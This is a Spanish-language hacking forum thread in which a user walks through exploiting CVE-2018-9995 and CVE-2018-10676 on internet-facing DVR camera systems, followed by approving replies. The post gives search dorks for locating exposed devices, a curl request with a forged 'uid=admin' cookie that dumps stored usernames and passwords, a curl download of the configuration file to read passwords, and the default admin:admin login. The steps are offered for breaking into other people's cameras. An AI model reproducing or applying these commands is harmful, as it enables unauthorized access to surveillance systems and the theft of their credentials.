Explotando CVE-2018-9995 y CVE-2018-10676 Multi DVR Login

Iniciado por DhaveSec, Mayo 09, 2018, 09:49:48 PM

Tema anterior - Siguiente tema

0 Miembros y 3 Visitantes están viendo este tema.

Mayo 09, 2018, 09:49:48 PM Ultima modificación: Mayo 09, 2018, 10:48:28 PM por sadfud


Explotando CVE-2018-9995 y CVE-2018-10676 Multi DVR Login 

Hola Mundo  8)

Ultimamente he estado trabajando con el tema de camaras de seguridad y/o Video vigilancia, y como muchos ya sabran existen
multiples formas de acceder a ellas desde la vieja y confiable:

Código: php
inurl:"/view/view.shtml"


El tipico Dork para algúnos modelos de  camaras AXIS,  hasta los CVE por parte del buen Ezequiel (@capitan_alfa),
de los cuales hoy vamos a realizar una pequeña PoC.  ;)

Estas vulnerabilidades afectan a multiples DVR alrededor del mundo, permitiendonos acceder a las credenciales
de los usuarios que el sistema tenga registrados, incluida la cuenta de administrador (Por supuesto), para comenzar
vamos a relizar una busqueda en Shodan para encontrar los dispositivos DVR conectados.

Código: php
"Server: GNU rsp/1.0"
 
Puedes encontrar aun mas dispositivos con:
Código: php
html:"/login.rsp" 




Como podran ver hay algunos miles de estos DVR conectados a la red, y su acceso tiene una vista como esta:



La primer vulnerabilidad nos permite obtener acceso al sistema (a las credenciales) mendiante una cookie que
internamente el sistema reconoce como "UID" que cuando se envia configurada con el valor "ADMIN" nos brinda el acceso al sistema,
bien podrias agregar manualmente esta cookie en el browser (MANTRA) o bien podrias ganar acceso a las credenciales mediante la terminal con la ayuda de curl.

Código: php
$> curl "http://<DVRHOST>:<PUERTO>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"


Una vez realizada la peticion obtendremos acceso a los usuarios y contraseñas del DVR



Ezequiel subio a su Github el exploit (tool) para ésta vulnerabilidad, dejo el enlace para quien lo requiera.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta,

Ataques minimalistas ;)

La segunda vulnerabilidad nos permite acceder a las contraseñas del sistema
mediante la descarga y posterior visualización de la configuración del DVR.

Nuevamente nos apoyamos de CURL para solicitar el archivo de configuracion:

Código: php
$> curl "http://<host>:<port>/download.rsp" --output allConfig 




Una vez descargado nos apoyamos de hexeditor para descubrir los datos:

Código: php
$> hexeditor allConfig


Tras una breve revision con el visor hexadecimal podemos reconocer los
usuarios y contraseñas del sistema de video vigilancia.



Basta con ingresar las credenciales que recolectamos y listo.


En conclusion tenemos multiples formas de acceder a estos DVR incluso si se llegan a agregar usuarios o cambiar contraseñas
y en caso de que no quisieras seguir el proceso el pass por defecto en estos DVR es admin:admin   ;D ;D ;D


Hack The World  8)

¿se puede inyector cookies con la consola de depuracion del navegador?

Muy buen post, me gustaria llevarlo a mi blog... es decir publicarlo en mi blog...

¿Me darias permiso?

NOTA: Te doy todo el credito por el post...

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muy buen post, me gustaria llevarlo a mi blog... es decir publicarlo en mi blog...

¿Me darias permiso?

NOTA: Te doy todo el credito por el post...

Claro, adelante, la info es mas util cuando se comparte. Saludos.

Gracias DhaveSec por compartir esta información. Había leído sobre esta vulnerabilidad antes pero no conocía los detalles.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
¿se puede inyector cookies con la consola de depuracion del navegador?

A primera vista si se podría hacer eso, ya que las cookies de estos sistemas no son HttpOnly.